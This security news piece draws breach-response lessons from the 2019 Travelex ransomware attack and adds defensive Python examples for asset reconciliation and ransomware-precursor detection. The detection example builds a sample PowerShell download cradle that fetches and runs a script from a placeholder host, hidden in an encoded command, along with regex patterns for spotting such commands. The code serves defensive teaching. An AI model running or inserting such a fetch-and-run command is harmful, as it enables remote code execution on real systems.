Calm Leadership and Asset Visibility Key to Effective Breach Response
Experts advise calm leadership and asset visibility to limit breach damage, citing lessons from the 2019 Travelex ransomware attack. Includes mitigation steps.

Proof of Concept: Anatomy of a Breach - Crisis Response
TL;DR: Calm leadership and clear asset visibility are essential to limit damage during a cyber breach, according to former Travelex security architect Don Gibson and DXC Technology’s Lars Klinghammer. Their advice stems from the 2019 Sodinokibi ransomware attack that crippled Travelex’s global currency exchange operations.
Context
When a breach occurs, technical confusion can quickly spiral into a business, legal, and reputational crisis. Early decisions shape long‑term recovery, yet many teams struggle to act with speed and clarity. Gibson and Klinghammer highlighted these challenges during a recent ISMG discussion on breach anatomy.
Key Facts
Gibson, who was security architect at Travelex during the December 2019 incident, says leaders must set aside their own feelings and become the calm, clear voice for the organization. The attackers used Sodinokibi (REvil) ransomware and reportedly gained initial access through Pulse Secure VPN appliances still vulnerable to CVE‑2019‑11510, a flaw for which a patch had been available for months. Once inside, they moved laterally with valid credentials, ran PowerShell scripts (MITRE ATT&CK T1059.001), and encrypted files across critical systems (T1486). The ransom demand was $6 million in Bitcoin; Travelex ultimately paid about $2.3 million. The attack shut down foreign‑exchange services in over 30 countries, affected roughly 5,000 employees, and exposed personal data of an undisclosed number of customers.
Klinghammer warned that a lack of visibility into assets and network activity undermines any defense. If defenders do not know which devices exist, which of them are patched, and what traffic is normal, they cannot spot the anomalies that precede ransomware deployment early enough to stop it.
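The visibility gap Klinghammer describes is concrete: an inventory that does not match what is actually on the network. The script below is an added example (not from the ISMG discussion or from Travelex) that reconciles a constructed asset inventory against constructed sightings from DHCP, ARP or a passive sensor, and reports devices nobody inventoried, inventoried hosts that have gone quiet or were never seen, and assets missing a fix their role requires (here the VPN fix the article names). All hostnames, addresses and the per-role fix policy are assumptions for illustration.

```python
"""Reconcile an asset inventory against observed hosts (added example, constructed data)."""
from datetime import datetime, timedelta

# Constructed CMDB: what the organisation *believes* is deployed. `patched` records
# the advisories/CVEs each asset has been remediated for.
INVENTORY = {
    "vpn-edge-01": {"ip": "203.0.113.10", "role": "vpn-appliance", "patched": {"CVE-2019-11510"}},
    "vpn-edge-02": {"ip": "203.0.113.11", "role": "vpn-appliance", "patched": set()},
    "dc-01":       {"ip": "10.0.0.5",     "role": "domain-controller", "patched": set()},
    "fx-app-07":   {"ip": "10.0.20.17",   "role": "app-server", "patched": set()},
    "fx-app-08":   {"ip": "10.0.20.18",   "role": "app-server", "patched": set()},
}

# Constructed policy: fixes every asset of a given role must have applied.
REQUIRED_FIXES = {"vpn-appliance": {"CVE-2019-11510"}}

# Constructed sightings: (ip, hostname as the device reported it, time last seen),
# e.g. from DHCP leases, ARP/MAC tables or a passive network sensor.
OBSERVED = [
    ("203.0.113.10", "vpn-edge-01",   datetime(2019, 12, 30, 9, 0)),
    ("203.0.113.11", "vpn-edge-02",   datetime(2019, 12, 30, 9, 0)),
    ("10.0.0.5",     "dc-01",         datetime(2019, 12, 30, 9, 1)),
    ("10.0.20.44",   "DESKTOP-7Q2K1", datetime(2019, 12, 30, 9, 3)),  # nobody inventoried this
    ("10.0.20.17",   "fx-app-07",     datetime(2019, 11, 1, 12, 0)),  # last seen weeks ago
]


def reconcile(inventory, observed, required, now, stale_after=timedelta(days=14)):
    """Compare inventory with sightings and return the gaps a responder needs to close.

    unknown   - observed addresses with no inventory record (shadow IT, rogue device)
    stale     - inventoried assets not seen within `stale_after` (offline, or IP changed)
    missing   - inventoried assets never observed at all (inventory is wrong or device gone)
    unpatched - inventoried assets lacking a fix their role requires
    """
    by_ip = {v["ip"]: name for name, v in inventory.items()}

    # Keep only the most recent sighting per address.
    last_seen = {}
    for ip, host, t in observed:
        if ip not in last_seen or t > last_seen[ip][1]:
            last_seen[ip] = (host, t)

    report = {"unknown": [], "stale": [], "missing": [], "unpatched": []}

    for ip, (host, t) in sorted(last_seen.items()):
        if ip not in by_ip:
            report["unknown"].append((ip, host))
        elif now - t > stale_after:
            report["stale"].append(by_ip[ip])

    for name, asset in inventory.items():
        if asset["ip"] not in last_seen:
            report["missing"].append(name)
        gaps = required.get(asset["role"], set()) - asset["patched"]
        if gaps:
            report["unpatched"].append((name, sorted(gaps)))

    return report


if __name__ == "__main__":
    result = reconcile(INVENTORY, OBSERVED, REQUIRED_FIXES, now=datetime(2019, 12, 30, 10, 0))
    for category, items in result.items():
        print(f"{category:9s} {items}")
```

Run against a real CMDB export and sensor data, the `unknown` and `unpatched` lists are the first two things to hand an incident commander: the former are hosts nobody can vouch for, the latter are the entry points an attacker would try first.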
What It Means
Organizations should treat breach response as a leadership and visibility problem, not only a technical one. Leaders must communicate factually and calmly to prevent panic, while security teams keep asset inventories and network maps accurate enough to be trusted during an incident. Immediate actions include patching internet‑facing remote‑access appliances promptly (for Pulse Secure, the fix for CVE‑2019‑11510), enforcing multi‑factor authentication on all remote access, and segmenting networks to limit lateral movement. Detection should focus on unusual PowerShell usage, use of valid credentials from unexpected hosts or at unexpected times, and bursts of file renames or writes consistent with encryption. Offline, regularly tested backups make recovery possible without paying a ransom, though they do not undo any data the attackers exfiltrated. Finally, exercise incident‑response playbooks that include clear communication chains and asset‑discovery steps, rather than writing them once and filing them away.
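To make the detection guidance above concrete, the following added example (not code from the ISMG discussion or from Travelex) runs two heuristics over constructed process‑creation and file events shaped loosely like Sysmon/Windows security log fields: suspicious PowerShell invocations (encoded command, hidden window, skipped profile, policy bypass, download cradle in the decoded payload; ATT&CK T1059.001), and a single process renaming many files to a previously unseen extension inside a short window (T1486). Hostnames, process names, the extension `k8f2x`, the staging URL and the thresholds are all constructed assumptions; the backup job in the sample shows why a known‑extension allow list is needed to avoid flagging legitimate bulk writers.

```python
"""Ransomware precursor detection over constructed events (added example)."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- Constructed sample data -----------------------------------------------------------
T0 = datetime(2019, 12, 31, 2, 0, 0)
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()  # what -EncodedCommand carries

PROCESS_EVENTS = [
    {"time": T0, "host": "fx-app-07", "user": "svc_backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"time": T0 + timedelta(minutes=1), "host": "dc-01", "user": "jsmith",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},           # benign admin use
]

FILE_EVENTS = (
    # one process renames 120 files to a new extension within ~40 s: ransomware-like
    [(T0 + timedelta(seconds=i // 3), "fx-app-07", "update.exe",
      rf"D:\shares\fx\report_{i:03}.xlsx.k8f2x") for i in range(120)]
    # a backup job also touches many files quickly, but with a known extension
    + [(T0 + timedelta(seconds=i // 3), "dc-01", "backup.exe",
        rf"E:\backup\ntds_{i:03}.bak") for i in range(120)]
    # ordinary interactive editing
    + [(T0 + timedelta(minutes=i), "wks-114", "winword.exe",
        rf"C:\Users\jsmith\Documents\memo_{i}.docx") for i in range(3)]
)
KNOWN_EXTENSIONS = {"docx", "xlsx", "pdf", "bak", "log", "tmp"}  # constructed baseline

# --- Heuristic 1: suspicious PowerShell (T1059.001) --------------------------------------
PS_SUSPICIOUS = [
    (re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-nop(?:rofile)?\b"), "profile skipped"),
    (re.compile(r"(?i)(?:-ep|-executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)downloadstring|downloadfile|iex\b|invoke-expression"), "download cradle"),
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -enc/-EncodedCommand, or None if absent/invalid."""
    m = re.search(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def flag_powershell(events):
    """Score each PowerShell launch; the decoded payload is matched as well as the raw line."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        text = ev["cmdline"]
        decoded = decode_encoded_command(text)
        if decoded:
            text = f"{text} {decoded}"
        reasons = [label for rx, label in PS_SUSPICIOUS if rx.search(text)]
        if reasons:
            hits.append({"host": ev["host"], "user": ev["user"],
                         "reasons": reasons, "decoded": decoded})
    return hits


# --- Heuristic 2: rapid encryption pattern (T1486) ---------------------------------------
def _ext(path):
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def flag_encryption_bursts(events, window=timedelta(seconds=60), threshold=50, known=KNOWN_EXTENSIONS):
    """Flag a (host, process) that touches >= threshold files with unknown extensions in one window."""
    by_proc = defaultdict(list)
    for t, host, proc, path in events:
        ext = _ext(path)
        if ext and ext not in known:
            by_proc[(host, proc)].append((t, path))

    hits = []
    for (host, proc), items in by_proc.items():
        items.sort()
        best, span, start = 0, (0, 0), 0
        for end in range(len(items)):            # sliding window over sorted timestamps
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start + 1 > best:
                best, span = end - start + 1, (start, end)
        if best >= threshold:
            exts = sorted({_ext(p) for _, p in items[span[0]:span[1] + 1]})
            hits.append({"host": host, "process": proc, "count": best, "new_extensions": exts})
    return hits


if __name__ == "__main__":
    for h in flag_powershell(PROCESS_EVENTS):
        print("PowerShell:", h["host"], h["user"], h["reasons"])
    for h in flag_encryption_bursts(FILE_EVENTS):
        print("Encryption burst:", h["host"], h["process"], h["count"], h["new_extensions"])
```

Both heuristics depend on the baseline the article argues for: the process check needs a list of hosts and accounts that legitimately run PowerShell, and the file check needs a known‑extension list and a threshold tuned to real backup and indexing jobs, or the backup server becomes the noisiest alert in the queue.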
Watch for evolving ransomware tactics that target cloud‑based identity services and for updated advisories on zero‑trust network architectures as defenders sharpen visibility and response readiness.